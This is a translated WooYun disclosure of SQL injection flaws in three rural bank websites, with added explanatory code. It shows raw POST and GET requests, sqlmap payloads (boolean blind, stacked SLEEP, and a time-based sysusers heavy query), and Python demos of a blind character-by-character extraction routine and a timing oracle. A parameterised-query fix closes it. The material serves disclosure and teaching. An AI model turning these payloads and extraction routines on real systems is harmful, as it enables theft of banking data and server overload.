
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0145544

Title: A bundle of vulnerabilities in three rural commercial banks

Vendor: 农商行 (rural commercial banks)

Author: 路人甲

Submitted: 2015-10-09 18:14

Fix deadline: 2015-11-27 18:00

Public disclosure: 2015-11-27 18:00

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-09: Details sent to the vendor, awaiting vendor handling
2015-10-13: Vendor confirmed; details visible to the vendor only
2015-10-23: Details opened to core white hats and experts in the relevant field
2015-11-02: Details opened to regular white hats
2015-11-12: Details opened to intern white hats
2015-11-27: Details opened to the public

Brief description:

Life holds too many unexpected things, and my heart aches... but I have to face them, however harsh.

Detailed description:

See the proof of vulnerability below.

Proof of vulnerability:

I am only proving that the vulnerabilities exist; dumping databases is neither my strength nor my hobby.
(1) 湖商村镇银行 (http://**.**.**.**)
POST-type SQL injection. Send the following POST request; the sid parameter is injectable.

POST /search.jsp HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: JSESSIONID=rBABAR-QVg08ecQlwZnLc0cnskwx-cWpSDAA
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Page=0&sid=502&topic=1


Test result:

sqlmap identified the following injection points with a total of 262 HTTP(s) requests:
---
Place: POST
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Page=0&sid=502 AND 5798=5798&topic=1
---
web server operating system: Windows 2003 or 7
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
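The sqlmap output above only says that a true tautology (`5798=5798`) and a false one make the search page respond differently. The block below is an added example (not code from the report or from the bank's site) that reproduces the defect behind finding (1) against a constructed in-memory SQLite stand-in for search.jsp, shows the true/false signal sqlmap used, and then turns that one-bit signal into a boolean-based blind extraction of an arbitrary value. The table and column names, the `admin_users` table and its hash are all invented for the demonstration; the real target ran SQL Server 2008, where `length`/`substr`/`unicode` become `LEN`/`SUBSTRING`/`ASCII` but the mechanics are the same.

```python
import sqlite3

# Constructed stand-in for the search.jsp back end of finding (1). Every name
# here (articles, admin_users, the hash value) is invented for the example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (sid INTEGER, topic INTEGER, title TEXT);
        INSERT INTO articles VALUES (502, 1, 'Branch opening hours');
        INSERT INTO articles VALUES (502, 1, 'Deposit rates');
        INSERT INTO articles VALUES (503, 1, 'Loan products');
        CREATE TABLE admin_users (name TEXT, pwd_hash TEXT);
        INSERT INTO admin_users VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db


def vulnerable_search(db, sid, topic):
    """The defect: the request parameters are concatenated straight into SQL."""
    sql = f"SELECT title FROM articles WHERE sid={sid} AND topic={topic}"
    return [row[0] for row in db.execute(sql)]


def confirm_injection(db):
    """sqlmap's detection pair: a true and a false tautology appended to sid=502.
    Returns (rows for true, rows for false); a difference is the signal."""
    true_rows = vulnerable_search(db, "502 AND 5798=5798", "1")
    false_rows = vulnerable_search(db, "502 AND 5798=5799", "1")
    return len(true_rows), len(false_rows)


def oracle(db, condition):
    """One 'request': True iff the page still returns results when CONDITION is
    ANDed onto sid=502. That single bit is all a blind injection leaks."""
    return len(vulnerable_search(db, f"502 AND ({condition})", "1")) > 0


def extract_string(db, subquery, max_len=64):
    """Recover the result of an arbitrary scalar SUBQUERY one character at a
    time: one request to check the length, then a binary search over the
    character code 0..127 (7 requests per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(db, f"length(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("rows for true/false payload:", confirm_injection(db))
    print("extracted:", extract_string(
        db, "SELECT pwd_hash FROM admin_users WHERE name='admin'"))
```

Each call to `oracle` corresponds to one HTTP request in the real attack; a 32-character value costs about 260 requests, which is the scale of the 262 requests sqlmap reported for detection alone. This is why "boolean-based blind" on a bank's public search form is a full database read, not a cosmetic error.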


(2) 黑河农商行 (http://**.**.**.**)
Injection point: http://**.**.**.**/Web_XXXX.aspx?InfoID=1. Simply browsing to this page threw an error, so I tested it while I was at it.

sqlmap identified the following injection points with a total of 116 HTTP(s) requests:
---
Place: GET
Parameter: InfoID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: InfoID=1' AND 1269=1269 AND 'MIcX'='MIcX
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: InfoID=1'; SELECT SLEEP(5)--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: MySQL 5.0.11


(3) 泉州农商行 (**.**.**.**)
Injection point: **.**.**.**/business.aspx?cid=-1. Appending a ' to the parameter produces an error.

[screenshot: 泉州1报错.png, the error page]

Here is the test result again:

sqlmap identified the following injection points with a total of 112 HTTP(s) requests:
---
Place: GET
Parameter: cid
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)
Payload: cid=(SELECT (CASE WHEN (3262=3262) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 3262 END))
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
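The payload sqlmap used for finding (3) deserves a closer look: the page content is identical whether the injected condition is true or false (cid=-1 matched nothing to begin with), so the only channel left is time, and SQL Server 2005 has no SLEEP. The CASE expression therefore runs a deliberately expensive self-join of sysusers only on the true branch. The block below is an added example, not code from the report or the bank's site, that rebuilds that payload shape against a constructed SQLite stand-in (a small `sysusers_stub` table and a `products` table are invented; SQLite replaces SQL Server) and shows a latency-only oracle built on it.

```python
import sqlite3
import time

# Constructed stand-in for finding (3). A cross join of JOIN_COPIES copies of a
# STUB_ROWS-row table visits STUB_ROWS**JOIN_COPIES rows; that cost is the
# whole trick behind a "heavy query".
STUB_ROWS = 40
JOIN_COPIES = 4


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (cid INTEGER, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(1, "Savings"), (2, "Mortgage")])
    db.execute("CREATE TABLE sysusers_stub (uid INTEGER)")
    db.executemany("INSERT INTO sysusers_stub VALUES (?)",
                   [(i,) for i in range(STUB_ROWS)])
    return db


def heavy_payload(condition, marker=3262):
    """Same shape as sqlmap's payload: the expensive COUNT(*) is evaluated only
    when CONDITION is true; otherwise the CASE yields the cheap constant."""
    joins = ", ".join(f"sysusers_stub AS sys{i}" for i in range(1, JOIN_COPIES + 1))
    return (f"(SELECT (CASE WHEN ({condition}) THEN "
            f"(SELECT COUNT(*) FROM {joins}) ELSE {marker} END))")


def vulnerable_business(db, cid):
    """business.aspx stand-in: cid is substituted verbatim ("parameter replace").
    Returns (rows, elapsed seconds)."""
    t0 = time.perf_counter()
    rows = db.execute(f"SELECT name FROM products WHERE cid={cid}").fetchall()
    return rows, time.perf_counter() - t0


def evaluate_case(db, condition):
    """Evaluate the injected expression on its own to see what it resolves to."""
    return db.execute("SELECT " + heavy_payload(condition)).fetchone()[0]


def timing_oracle(db, condition):
    """Decide CONDITION from latency alone. The baseline is the best of three
    requests with a condition known to be false; the response body is useless
    here because it is empty either way."""
    baseline = min(vulnerable_business(db, heavy_payload("1=2"))[1] for _ in range(3))
    _, elapsed = vulnerable_business(db, heavy_payload(condition))
    return elapsed > max(10 * baseline, 0.005)


if __name__ == "__main__":
    db = make_db()
    print("true branch resolves to", evaluate_case(db, "3262=3262"))
    print("false branch resolves to", evaluate_case(db, "3262=3263"))
    print("second product is 'Mortgage':",
          timing_oracle(db, "(SELECT name FROM products WHERE cid=2)='Mortgage'"))
```

On the real target the seven-way self-join of sysusers plays the role of `sysusers_stub`; the attacker tunes the number of copies until the true branch takes a few seconds, then substitutes any condition (a character of a column value, as in the last call above) for `3262=3262`. Note that the heavy branch also burns CPU on the database server, so this technique doubles as a denial-of-service lever on a production banking host.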


OK, that is all.

Fix recommendation:

There is no reason for banking systems not to take this seriously.
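All three findings share one root cause: a request parameter that should only ever be an integer (sid, InfoID, cid) is pasted into the SQL text. The block below is an added example, not code from the report or from any of the banks, of the two measures that close it: strict allow-list validation at the boundary and a parameterised query. It is written against a constructed SQLite table; on the JSP and ASP.NET stacks in the report the same parameterised form is `PreparedStatement` with `setInt` and `SqlCommand` with `SqlParameter` respectively. The payloads fed to it are the ones sqlmap reported above.

```python
import re
import sqlite3


# Constructed stand-in for a fixed search handler; table and rows are invented.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (sid INTEGER, topic INTEGER, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                   [(502, 1, "Branch opening hours"),
                    (502, 1, "Deposit rates"),
                    (503, 1, "Loan products")])
    return db


# What a legitimate sid / topic / InfoID / cid looks like: a short decimal integer.
INT_PARAM = re.compile(r"[0-9]{1,9}")


def hardened_search(db, sid, topic):
    # Measure 1: allow-list validation before any SQL exists. Anything that is
    # not a short decimal integer is rejected outright.
    for name, value in (("sid", sid), ("topic", topic)):
        if not isinstance(value, str) or not INT_PARAM.fullmatch(value):
            raise ValueError(f"invalid {name}")
    # Measure 2: a parameterised query. The SQL text is a constant; the driver
    # ships the values separately, so they are never parsed as SQL.
    rows = db.execute("SELECT title FROM articles WHERE sid=? AND topic=?",
                      (int(sid), int(topic)))
    return [r[0] for r in rows]


def parameterised_only(db, sid):
    """Measure 2 on its own: even with no validation at all, an injected
    string is just a value that matches no row."""
    rows = db.execute("SELECT title FROM articles WHERE sid=? AND topic=?", (sid, 1))
    return [r[0] for r in rows]


def probe(db, sid):
    """Feed a raw parameter value to the hardened handler; 'rejected' on failure."""
    try:
        return hardened_search(db, sid, "1")
    except ValueError:
        return "rejected"


# The injection payloads sqlmap reported in this disclosure.
PAYLOADS = [
    "502 AND 5798=5798",                  # finding (1), boolean-based blind
    "1' AND 1269=1269 AND 'MIcX'='MIcX",  # finding (2), boolean-based blind
    "1'; SELECT SLEEP(5)--",              # finding (2), stacked query
]


if __name__ == "__main__":
    db = make_db()
    print("sid=502 ->", probe(db, "502"))
    for p in PAYLOADS:
        print(repr(p), "->", probe(db, p))
```

Validation alone is not a substitute for parameterisation (a later change to accept a free-text field would reopen the hole), and parameterisation alone still lets attacker-shaped strings reach the database; doing both is cheap and makes every payload in this report inert.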

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 14

Confirmed: 2015-10-13 17:58

Vendor reply:


CNVD has confirmed and reproduced the reported issues and has forwarded them via CNCERT to the competent authority for banking-industry informatisation, which will coordinate remediation with the units operating the sites. Also forwarded to the corresponding branch centres. Rank 14.

Latest status:

None yet